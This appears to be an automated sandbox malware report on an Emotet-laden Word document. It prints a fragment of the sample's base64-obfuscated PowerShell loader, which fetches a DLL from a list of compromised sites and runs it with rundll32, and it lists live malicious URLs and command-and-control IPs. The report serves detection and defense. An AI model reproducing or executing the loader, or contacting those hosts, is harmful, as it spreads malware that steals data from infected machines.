IAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemorySystem Information Discovery15Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter211Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading21Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 344718 Sample: ARCH_25_012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Multi AV Scanner detection for domain / URL 2->51 53 Antivirus detection for URL or domain 2->53 55 14 other signatures 2->55 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 28 2->17         started        process3 signatures4 63 Suspicious powershell command line found 14->63 65 Very long command line found 14->65 67 Encrypted powershell cmdline option found 14->67 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 shannared.com 192.169.223.13, 49165, 80 AS-26496-GO-DADDY-COM-LLCUS United States 19->47 45 C:\Users\user\Kaktksw\An6othh4549I.dll, PE32 19->45 dropped 59 Powershell drops PE file 19->59 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->57 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->61 43 rundll32.exe 40->43         started        process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ARCH_25_012021.doc16%VirustotalBrowse
                      ARCH_25_012021.doc26%ReversingLabsDocument-Word.Trojan.GenScript

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Kaktksw\An6othh\N49I.dll100%Joe Sandbox ML
                      C:\Users\user\Kaktksw\An6othh\N49I.dll55%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      12.2.rundll32.exe.2c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.660000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.410000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.240000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                      16.2.rundll32.exe.280000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.300000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.140000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.410000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.740000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      11.2.rundll32.exe.5a0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      shannared.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://3musketeersent.net/wp-includes/TUgD/8%VirustotalBrowse
                      http://3musketeersent.net/wp-includes/TUgD/100%Avira URL Cloudmalware
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://skilmu.com/wp-admin/hQVlB8b/11%VirustotalBrowse
                      https://skilmu.com/wp-admin/hQVlB8b/0%Avira URL Cloudsafe
                      http://jeevanlic.com/wp-content/r8M/14%VirustotalBrowse
                      http://jeevanlic.com/wp-content/r8M/0%Avira URL Cloudsafe
                      http://dashudance.com/thinkphp/dgs7Jm9/14%VirustotalBrowse
                      http://dashudance.com/thinkphp/dgs7Jm9/100%Avira URL Cloudmalware
                      http://shannared.com0%Avira URL Cloudsafe
                      http://shannared.com/content/lhALeS/100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://leopardcranes.com/zynq-linux-yaayf/w/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shannared.com
                      192.169.223.13
                      truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://shannared.com/content/lhALeS/true
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpfalse
                        high
                        http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpfalse
                              high
                              http://3musketeersent.net/wp-includes/TUgD/powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmptrue
                              • 8%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmpfalse
                                high
                                https://skilmu.com/wp-admin/hQVlB8b/powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmptrue
                                • 11%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://jeevanlic.com/wp-content/r8M/powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmptrue
                                • 14%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://dashudance.com/thinkphp/dgs7Jm9/powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmptrue
                                • 14%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://shannared.compowershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.%s.comPApowershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpfalse
                                    high
                                    http://leopardcranes.com/zynq-linux-yaayf/w/powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    217.160.169.110
                                    unknownGermany
                                    8560ONEANDONE-ASBrauerstrasse48DEtrue
                                    185.183.16.47
                                    unknownSpain
                                    201453AKIWIFIAKIWIFIEStrue
                                    51.255.203.164
                                    unknownFrance
                                    16276OVHFRtrue
                                    84.232.229.24
                                    unknownRomania
                                    8708RCS-RDS73-75DrStaicoviciROtrue
                                    192.169.223.13
                                    unknownUnited States
                                    26496AS-26496-GO-DADDY-COM-LLCUStrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:344718
                                    Start date:27.01.2021
                                    Start time:00:09:24
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 36s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:ARCH_25_012021.doc
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winDOC@28/8@1/5
                                    EGA Information:
                                    • Successful, ratio: 90.9%
                                    HDC Information:
                                    • Successful, ratio: 8.7% (good quality ratio 6.4%)
                                    • Quality average: 59.1%
                                    • Quality standard deviation: 37.6%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .doc
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Execution Graph export aborted for target powershell.exe, PID 2544 because it is empty
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    00:09:36API Interceptor1x Sleep call for process: msg.exe modified
                                    00:09:37API Interceptor45x Sleep call for process: powershell.exe modified
                                    00:09:43API Interceptor287x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    217.160.169.110Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                    • 217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/
                                    185.183.16.47b6TR6I8A8W.exeGet hashmaliciousBrowse
                                      51.255.203.164Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                        84.232.229.24Notice 8283393_829.docGet hashmaliciousBrowse
                                        • 84.232.229.24/ozrf6dcy5j/7k5jvcfnl1c/ccmrg6oyv4nizx6/
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/
                                        MENSAJE.docGet hashmaliciousBrowse
                                        • 84.232.229.24/40hbu1ld1mxg/gbxh6m/w00gy5ya8o03k/
                                        MES-2021_01_22-3943960.docGet hashmaliciousBrowse
